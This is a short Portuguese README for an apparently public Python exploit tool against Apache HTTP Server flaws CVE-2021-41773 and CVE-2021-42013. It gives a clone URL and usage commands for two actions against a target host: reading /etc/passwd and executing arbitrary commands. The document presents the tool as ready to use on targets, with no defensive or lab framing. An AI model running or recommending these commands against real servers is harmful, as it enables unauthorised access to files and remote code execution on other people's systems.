
Exploit criado em python3 para explorar vulnerabilidades conhecidas no servidor web Apache (CVE-2021-41773, CVE-2021-42013)
Exploit criado em python3 para explorar vulnerabilidades conhecidas no servidor web Apache (CVE-2021-41773, CVE-2021-42013)
O Projeto Apache HTTP Server é um esforço para desenvolver e manter um servidor HTTP de código aberto para sistemas operacionais modernos, incluindo UNIX e Windows. O objetivo deste projeto é fornecer um servidor seguro, eficiente e extensível que ofereça serviços HTTP em conformidade com os padrões HTTP atuais.
Basta fazer um git clone:
git clone https://github.com/0xGabe/Apache-CVEs
Para ler o arquivo desejado, basta passar o caminho do arquivo; se o usuário não tiver permissão de leitura, não haverá resultado.
python3 cve-2021-41773.py --url http://HOST:PORT --path /etc/passwd
Para executar comandos com espaços, caracteres especiais ou similares na máquina alvo, é necessário passar o comando entre aspas.
python3 cve-2021-41773.py --url http://HOST:PORT --cmd id
Para ler o arquivo desejado, basta passar o caminho do arquivo; se o usuário não tiver permissão de leitura, não haverá resultado.
python3 cve-2021-42013.py --url http://HOST:PORT --path /etc/passwd
Para executar comandos com espaços, caracteres especiais ou similares na máquina alvo, é necessário passar o comando entre aspas.
python3 cve-2021-42013.py --url http://HOST:PORT --cmd id